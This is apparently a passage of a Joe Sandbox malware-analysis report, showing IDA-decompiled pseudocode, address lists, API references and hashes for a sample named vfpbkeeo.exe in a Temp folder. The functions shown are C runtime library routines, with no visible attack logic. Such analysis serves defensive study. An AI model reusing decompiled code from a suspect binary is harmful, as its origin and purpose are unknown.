				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x418020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E004026B4(_t13,  *0x418020);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E004026EF(_t14,  *0x418020, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00406242();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E004026EF(_t18,  *0x418020, 0);
								} else {
									_t8 = E004026EF(_t18,  *0x418020, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0040617E(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                                                                              0x004023d1
                                                                                              0x004023d8
                                                                                              0x004023eb
                                                                                              0x004023f2
                                                                                              0x004023f4
                                                                                              0x004023f8
                                                                                              0x00402411
                                                                                              0x00402411
                                                                                              0x004023fa
                                                                                              0x004023fc
                                                                                              0x0040240f
                                                                                              0x00402416
                                                                                              0x0040241f
                                                                                              0x00402422
                                                                                              0x00402425
                                                                                              0x00402439
                                                                                              0x00402439
                                                                                              0x00402442
                                                                                              0x00402427
                                                                                              0x0040242e
                                                                                              0x00402434
                                                                                              0x00402437
                                                                                              0x0040244b
                                                                                              0x0040244d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402437
                                                                                              0x00402450
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040240f
                                                                                              0x004023fc
                                                                                              0x00402458
                                                                                              0x00402462
                                                                                              0x004023da
                                                                                              0x004023dc
                                                                                              0x004023dc

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,004023C8,0040209C,00401906), ref: 004023DF
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004023ED
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00402406
                                                                                              • SetLastError.KERNEL32(00000000,004023C8,0040209C,00401906), ref: 00402458
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 39fbbe23a9d3d999e504d571491f29087366f2ca03f1218a766f655faeaeec37
                                                                                              • Instruction ID: fb956ac64ef3f031054770dc6936e8de93e748403b16b65d0a618f2cb70cc1ef
                                                                                              • Opcode Fuzzy Hash: 39fbbe23a9d3d999e504d571491f29087366f2ca03f1218a766f655faeaeec37
                                                                                              • Instruction Fuzzy Hash: F20124335083215FEA1467B6AD8D6AB3B96EB09378721423FF610712F1EEFA4C05514C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004042B7 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 64%
                                                                                              			E004042B7(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _t78;
				signed int _t80;
				char _t81;
				intOrPtr* _t82;
				void* _t86;
				signed int _t88;
				signed int _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t96;
				signed char _t100;
				signed char _t103;
				signed char _t109;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t115;
				char _t117;
				intOrPtr _t118;
				intOrPtr _t124;
				signed int _t125;
				signed int _t126;
				signed int _t130;
				signed int _t131;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t139;
				intOrPtr _t140;

				_t78 = E0040656B(_a4);
				_v36 = _t78;
				_t130 = _t78 >> 6;
				_t80 = (_t78 & 0x0000003f) * 0x38;
				_v40 = _t130;
				_t117 =  *((intOrPtr*)(0x418ec0 + _t130 * 4));
				_v32 = _t117;
				_v28 = _t80;
				_v16 = 0;
				_t10 = _t80 + 0x29; // 0x1600c7
				_t81 =  *((intOrPtr*)(_t117 + _t10));
				_v24 = _t81;
				if(_t81 != 1) {
					_v12 = 1;
				} else {
					_t140 = 2;
					_v12 = _t140;
				}
				_t82 = _a4;
				_t15 = _t82 + 8; // 0xfffffb64
				_t118 =  *_t15;
				_v20 = _t118;
				if(_t118 != 0) {
					_t19 = _t82 + 4; // 0xe8f08bd8
					_t20 =  &_v32; // 0x404209
					_t135 =  *_t20;
					asm("cdq");
					_v8 = _t130;
					asm("cdq");
					_t122 =  *_t82 -  *_t19 + _v20;
					_t85 = _v8;
					_v20 =  *_t82 -  *_t19 + _v20;
					asm("adc eax, edx");
					_t131 = _v28;
					__eflags =  *((char*)(_t135 + _t131 + 0x28));
					_t136 = _v12;
					if( *((char*)(_t135 + _t131 + 0x28)) < 0) {
						_t31 =  &_a24; // 0x404209
						_t137 = _v36;
						_t86 = E00406876(_v36, 0, 0, 2,  *_t31);
						__eflags = _t86 - _a8;
						if(_t86 != _a8) {
							L14:
							_t88 = E00406876(_t137, _a8, _a12, 0, _a24) & _t131;
							_t131 = _t131 | 0xffffffff;
							__eflags = _t88 - _t131;
							if(_t88 != _t131) {
								__eflags = _v8;
								if(__eflags > 0) {
									L22:
									asm("cdq");
									_v8 =  *((intOrPtr*)(_a4 + 0x18));
									L23:
									_t91 = _v28;
									_t124 =  *((intOrPtr*)(0x418ec0 + _v40 * 4));
									__eflags =  *(_t91 + _t124 + 0x28) & 0x00000004;
									if(( *(_t91 + _t124 + 0x28) & 0x00000004) == 0) {
										_t125 = _v8;
										L29:
										_t114 = _v12;
										_t92 = E00410B00(_t125, _t131, _t114, _v16);
										_push(_v16);
										L30:
										_push(_t114);
										_push(_a20);
										_push(_a16);
										_t93 = E00410B00();
										asm("sbb edx, edi");
										asm("adc edx, [ebp+0x10]");
										return _t93 - _t92 + _a8;
									}
									_t96 = _v24;
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										L26:
										_push(2);
										_pop(1);
										L27:
										_t126 = _v8;
										L13:
										_t125 = _t126 + 1;
										asm("adc edx, edi");
										goto L29;
									}
									__eflags = _t96 - 2;
									if(_t96 != 2) {
										goto L27;
									}
									goto L26;
								}
								_v8 = 0x200;
								if(__eflags < 0) {
									L19:
									_t100 =  *(_a4 + 0xc) >> 6;
									__eflags = 1 & _t100;
									if((1 & _t100) == 0) {
										goto L22;
									}
									_t103 =  *(_a4 + 0xc) >> 8;
									__eflags = 1 & _t103;
									if((1 & _t103) != 0) {
										goto L22;
									}
									_t131 = 0;
									goto L23;
								}
								__eflags = _v20 - 0x200;
								if(_v20 > 0x200) {
									goto L22;
								}
								goto L19;
							}
							return _t131;
						}
						__eflags = _t131 - _a12;
						if(_t131 != _a12) {
							goto L14;
						}
						_t139 = _a4;
						_t125 = E0040462D( *((intOrPtr*)(_t139 + 4)), _v20 +  *((intOrPtr*)(_t139 + 4)), _v24) + _v20;
						asm("adc edx, [ebp-0x4]");
						_t109 =  *(_t139 + 0xc) >> 5;
						__eflags = 1 & _t109;
						if((1 & _t109) == 0) {
							goto L29;
						}
						_t110 = _v24;
						__eflags = _t110 - 1;
						if(_t110 == 1) {
							L12:
							_push(2);
							_pop(1);
							goto L13;
						}
						__eflags = _t110 - 2;
						if(_t110 != 2) {
							goto L13;
						}
						goto L12;
					}
					_t115 = _v16;
					_t92 = E00410B00(_t122, _t85, _t136, _t115);
					_push(_t115);
					_t114 = _t136;
					goto L30;
				} else {
					return _a8;
				}
			}







































                                                                                              0x004042c5
                                                                                              0x004042cc
                                                                                              0x004042d2
                                                                                              0x004042d5
                                                                                              0x004042dc
                                                                                              0x004042df
                                                                                              0x004042e8
                                                                                              0x004042eb
                                                                                              0x004042ee
                                                                                              0x004042f1
                                                                                              0x004042f1
                                                                                              0x004042f5
                                                                                              0x004042fa
                                                                                              0x00404304
                                                                                              0x004042fc
                                                                                              0x004042fe
                                                                                              0x004042ff
                                                                                              0x004042ff
                                                                                              0x00404307
                                                                                              0x0040430a
                                                                                              0x0040430a
                                                                                              0x0040430d
                                                                                              0x00404312
                                                                                              0x00404321
                                                                                              0x00404324
                                                                                              0x00404324
                                                                                              0x00404329
                                                                                              0x0040432c
                                                                                              0x00404332
                                                                                              0x00404333
                                                                                              0x00404335
                                                                                              0x00404338
                                                                                              0x0040433b
                                                                                              0x0040433d
                                                                                              0x00404343
                                                                                              0x00404348
                                                                                              0x0040434b
                                                                                              0x00404361
                                                                                              0x00404364
                                                                                              0x0040436c
                                                                                              0x00404374
                                                                                              0x00404377
                                                                                              0x004043c4
                                                                                              0x004043d4
                                                                                              0x004043d9
                                                                                              0x004043dc
                                                                                              0x004043de
                                                                                              0x004043e7
                                                                                              0x004043ea
                                                                                              0x0040441b
                                                                                              0x00404421
                                                                                              0x00404422
                                                                                              0x00404425
                                                                                              0x00404428
                                                                                              0x0040442b
                                                                                              0x00404432
                                                                                              0x00404437
                                                                                              0x0040444f
                                                                                              0x00404452
                                                                                              0x00404455
                                                                                              0x0040445b
                                                                                              0x00404460
                                                                                              0x00404463
                                                                                              0x00404463
                                                                                              0x00404464
                                                                                              0x0040446b
                                                                                              0x0040446e
                                                                                              0x00404475
                                                                                              0x0040447a
                                                                                              0x00000000
                                                                                              0x0040447a
                                                                                              0x00404439
                                                                                              0x0040443c
                                                                                              0x0040443e
                                                                                              0x00404444
                                                                                              0x00404444
                                                                                              0x00404446
                                                                                              0x00404447
                                                                                              0x00404447
                                                                                              0x004043bb
                                                                                              0x004043bb
                                                                                              0x004043bd
                                                                                              0x00000000
                                                                                              0x004043bd
                                                                                              0x00404440
                                                                                              0x00404442
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404442
                                                                                              0x004043f1
                                                                                              0x004043f4
                                                                                              0x004043fb
                                                                                              0x00404402
                                                                                              0x00404405
                                                                                              0x00404407
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404410
                                                                                              0x00404413
                                                                                              0x00404415
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404417
                                                                                              0x00000000
                                                                                              0x00404417
                                                                                              0x004043f6
                                                                                              0x004043f9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004043f9
                                                                                              0x00000000
                                                                                              0x004043e0
                                                                                              0x00404379
                                                                                              0x0040437c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040437e
                                                                                              0x00404398
                                                                                              0x0040439e
                                                                                              0x004043a2
                                                                                              0x004043a5
                                                                                              0x004043a7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004043ad
                                                                                              0x004043b0
                                                                                              0x004043b2
                                                                                              0x004043b8
                                                                                              0x004043b8
                                                                                              0x004043ba
                                                                                              0x00000000
                                                                                              0x004043ba
                                                                                              0x004043b4
                                                                                              0x004043b6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004043b6
                                                                                              0x0040434d
                                                                                              0x00404354
                                                                                              0x00404359
                                                                                              0x0040435a
                                                                                              0x00000000
                                                                                              0x00404314
                                                                                              0x00000000
                                                                                              0x00404317

                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00404354
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040445B
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040446E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: B@$B@
                                                                                              • API String ID: 885266447-2256864882
                                                                                              • Opcode ID: 2bd672f4b93b8e84d5363833de7c8a2a3724070b457573ba0a9a5d6950f16b0b
                                                                                              • Instruction ID: 4fde89a1bbf7295ad48146bc504501ace4e7bbe892eeda8eac33109f3bc96ce1
                                                                                              • Opcode Fuzzy Hash: 2bd672f4b93b8e84d5363833de7c8a2a3724070b457573ba0a9a5d6950f16b0b
                                                                                              • Instruction Fuzzy Hash: 5A5194B1A00109AFCF14CF59C881EEEBBB2EF89314F14816AEA55A7391D334ED41CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408EBC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00408EBC(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E004099F0(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E00408D13(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E00407AD0(GetLastError());
									_t18 =  *((intOrPtr*)(E00407B2A()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E00408F7E(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00407AD0(GetLastError());
						_t18 =  *((intOrPtr*)(E00407B2A()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E00408F7E(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00408FA5(_a8);
				return 0;
			}









                                                                                              0x00408ec2
                                                                                              0x00408ec7
                                                                                              0x00408ede
                                                                                              0x00408f10
                                                                                              0x00408f1a
                                                                                              0x00408f33
                                                                                              0x00408f39
                                                                                              0x00408f47
                                                                                              0x00408f54
                                                                                              0x00408f5b
                                                                                              0x00408f74
                                                                                              0x00408f77
                                                                                              0x00408f5d
                                                                                              0x00408f64
                                                                                              0x00408f6f
                                                                                              0x00408f6f
                                                                                              0x00408f79
                                                                                              0x00408f7a
                                                                                              0x00000000
                                                                                              0x00408f7a
                                                                                              0x00408f3e
                                                                                              0x00408f45
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408f45
                                                                                              0x00408f23
                                                                                              0x00408f2e
                                                                                              0x00000000
                                                                                              0x00408f2e
                                                                                              0x00408ee0
                                                                                              0x00408ee6
                                                                                              0x00408ef9
                                                                                              0x00408efc
                                                                                              0x00408efe
                                                                                              0x00408f00
                                                                                              0x00000000
                                                                                              0x00408f00
                                                                                              0x00408eec
                                                                                              0x00408ef3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408ef3
                                                                                              0x00408ecc
                                                                                              0x00000000

                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe, xrefs: 00408ED8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
                                                                                              • API String ID: 0-4012976142
                                                                                              • Opcode ID: 9479110019f59d18c55a18df3f8b00f369090a96f70aba91396b071b384277fb
                                                                                              • Instruction ID: 888caf631ae3cb71ddbeff795d875caeb96e83c0d8b5e8135c18383809293f6d
                                                                                              • Opcode Fuzzy Hash: 9479110019f59d18c55a18df3f8b00f369090a96f70aba91396b071b384277fb
                                                                                              • Instruction Fuzzy Hash: 5221A131604206AFEB10AF72C940D6B776AEF04368710853EF995B7691EF38EC018799
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004058C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 25%
                                                                                              			E004058C7(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x418014; // 0xcd317e6f
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x410e1f, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x4111c0(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                                                                              0x004058dc
                                                                                              0x004058e7
                                                                                              0x004058ed
                                                                                              0x004058f1
                                                                                              0x004058fc
                                                                                              0x00405904
                                                                                              0x0040590e
                                                                                              0x00405914
                                                                                              0x00405918
                                                                                              0x0040591f
                                                                                              0x00405925
                                                                                              0x00405925
                                                                                              0x00405918
                                                                                              0x0040592b
                                                                                              0x00405930
                                                                                              0x00405930
                                                                                              0x00405939
                                                                                              0x00405943

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CD317E6F,00416638,?,00000000,00410E1F,000000FF,?,004058A3,FFFFFFFE,?,00405877,?), ref: 004058FC
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040590E
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00410E1F,000000FF,?,004058A3,FFFFFFFE,?,00405877,?), ref: 00405930
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 6e3fd1a8519984f15941d17912cd5f5a98cdaa0edf815df5f429e728a6bb66a3
                                                                                              • Instruction ID: ead5172505c9ba9b0b96fbfe6033cfa7bb945d978775c902944be6c73fe8143e
                                                                                              • Opcode Fuzzy Hash: 6e3fd1a8519984f15941d17912cd5f5a98cdaa0edf815df5f429e728a6bb66a3
                                                                                              • Instruction Fuzzy Hash: B401A271900659FFDB118F50DC05BEFBBB8FB08B21F00453AEA11A26E0DB789940CE98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D9C4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E0040D9C4(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				intOrPtr _t45;
				signed int _t48;
				void* _t51;
				signed int _t55;
				intOrPtr _t64;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t73;
				intOrPtr _t89;
				void* _t90;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x418014; // 0xcd317e6f
				_v8 = _t40 ^ _t96;
				_t89 = _a20;
				if(_t89 > 0) {
					_t69 = E0040E762(_a16, _t89);
					_t103 = _t69 - _t89;
					_t4 = _t69 + 1; // 0x1
					_t89 = _t4;
					if(_t103 >= 0) {
						_t89 = _t69;
					}
				}
				_t71 = _a32;
				if(_a32 == 0) {
					_t71 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t45 = E00409936(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t45;
				if(_t45 == 0) {
					L38:
					_pop(_t90);
					_pop(_t94);
					_pop(_t72);
					return E00401BA5(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
				} else {
					_t16 = _t45 + _t45 + 8; // 0x8
					asm("sbb eax, eax");
					_t48 = _t45 + _t45 & _t16;
					if(_t48 == 0) {
						_t95 = 0;
						L36:
						_t73 = 0;
						L37:
						E0040A7B2(_t95);
						_t45 = _t73;
						goto L38;
					}
					if(_t48 > 0x400) {
						_t95 = E0040A663(_t48);
						if(_t95 == 0) {
							goto L36;
						}
						 *_t95 = 0xdddd;
						L12:
						if(_t95 == 0) {
							goto L36;
						}
						_t51 = E00409936(_t71, 1, _a16, _t89, _t95, _v12);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L36;
						}
						_t91 = _v12;
						_t73 = E0040AF2A(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
						if(_t73 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t30 = _t73 + _t73 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t73 + _t73 & _t30;
							if(_t55 == 0) {
								_t92 = 0;
								L34:
								E0040A7B2(_t92);
								goto L36;
							}
							if(_t55 > 0x400) {
								_t92 = E0040A663(_t55);
								if(_t92 == 0) {
									goto L34;
								}
								 *_t92 = 0xdddd;
								L26:
								_t92 = _t92 + 8;
								if(_t92 == 0 || E0040AF2A(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
									goto L34;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t73);
									_push(_t92);
									_push(0);
									_push(_a32);
									_t73 = E004099F0();
									if(_t73 == 0) {
										goto L34;
									} else {
										E0040A7B2(_t92);
										goto L37;
									}
								}
							}
							E00410BE0(_t55);
							_t92 = _t100;
							if(_t92 == 0) {
								goto L34;
							}
							 *_t92 = 0xcccc;
							goto L26;
						}
						_t64 = _a28;
						if(_t64 == 0) {
							goto L37;
						}
						if(_t73 > _t64) {
							goto L36;
						}
						_t73 = E0040AF2A(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
						if(_t73 != 0) {
							goto L37;
						}
						goto L36;
					}
					E00410BE0(_t48);
					_t95 = _t98;
					if(_t95 == 0) {
						goto L36;
					}
					 *_t95 = 0xcccc;
					goto L12;
				}
			}




























                                                                                              0x0040d9c9
                                                                                              0x0040d9ca
                                                                                              0x0040d9cb
                                                                                              0x0040d9d2
                                                                                              0x0040d9d8
                                                                                              0x0040d9dd
                                                                                              0x0040d9e3
                                                                                              0x0040d9e9
                                                                                              0x0040d9ec
                                                                                              0x0040d9ec
                                                                                              0x0040d9ef
                                                                                              0x0040d9f1
                                                                                              0x0040d9f1
                                                                                              0x0040d9ef
                                                                                              0x0040d9f3
                                                                                              0x0040d9f8
                                                                                              0x0040d9ff
                                                                                              0x0040da02
                                                                                              0x0040da02
                                                                                              0x0040da1e
                                                                                              0x0040da23
                                                                                              0x0040da26
                                                                                              0x0040da2b
                                                                                              0x0040dba1
                                                                                              0x0040dba4
                                                                                              0x0040dba5
                                                                                              0x0040dba6
                                                                                              0x0040dbb2
                                                                                              0x0040da31
                                                                                              0x0040da33
                                                                                              0x0040da38
                                                                                              0x0040da3a
                                                                                              0x0040da3c
                                                                                              0x0040db94
                                                                                              0x0040db96
                                                                                              0x0040db96
                                                                                              0x0040db98
                                                                                              0x0040db99
                                                                                              0x0040db9f
                                                                                              0x00000000
                                                                                              0x0040db9f
                                                                                              0x0040da47
                                                                                              0x0040da66
                                                                                              0x0040da6b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040da71
                                                                                              0x0040da77
                                                                                              0x0040da7c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040da8d
                                                                                              0x0040da92
                                                                                              0x0040da97
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040da9d
                                                                                              0x0040dab4
                                                                                              0x0040dab8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040dac6
                                                                                              0x0040db03
                                                                                              0x0040db08
                                                                                              0x0040db0a
                                                                                              0x0040db0c
                                                                                              0x0040db89
                                                                                              0x0040db8b
                                                                                              0x0040db8c
                                                                                              0x00000000
                                                                                              0x0040db91
                                                                                              0x0040db10
                                                                                              0x0040db2b
                                                                                              0x0040db30
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040db32
                                                                                              0x0040db38
                                                                                              0x0040db38
                                                                                              0x0040db3d
                                                                                              0x00000000
                                                                                              0x0040db59
                                                                                              0x0040db5b
                                                                                              0x0040db5c
                                                                                              0x0040db60
                                                                                              0x0040db81
                                                                                              0x0040db84
                                                                                              0x0040db62
                                                                                              0x0040db62
                                                                                              0x0040db63
                                                                                              0x0040db63
                                                                                              0x0040db64
                                                                                              0x0040db65
                                                                                              0x0040db66
                                                                                              0x0040db67
                                                                                              0x0040db6f
                                                                                              0x0040db76
                                                                                              0x00000000
                                                                                              0x0040db78
                                                                                              0x0040db79
                                                                                              0x00000000
                                                                                              0x0040db7e
                                                                                              0x0040db76
                                                                                              0x0040db3d
                                                                                              0x0040db12
                                                                                              0x0040db17
                                                                                              0x0040db1b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040db1d
                                                                                              0x00000000
                                                                                              0x0040db1d
                                                                                              0x0040dac8
                                                                                              0x0040dacd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040dad5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040daf1
                                                                                              0x0040daf5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040dafb
                                                                                              0x0040da49
                                                                                              0x0040da4e
                                                                                              0x0040da52
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040da58
                                                                                              0x00000000
                                                                                              0x0040da58

                                                                                              APIs
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040DA49
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040DB12
                                                                                              • __freea.LIBCMT ref: 0040DB79
                                                                                                • Part of subcall function 0040A663: HeapAlloc.KERNEL32(00000000,00409435,?,?,00409435,00000220,?,00000000,?), ref: 0040A695
                                                                                              • __freea.LIBCMT ref: 0040DB8C
                                                                                              • __freea.LIBCMT ref: 0040DB99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
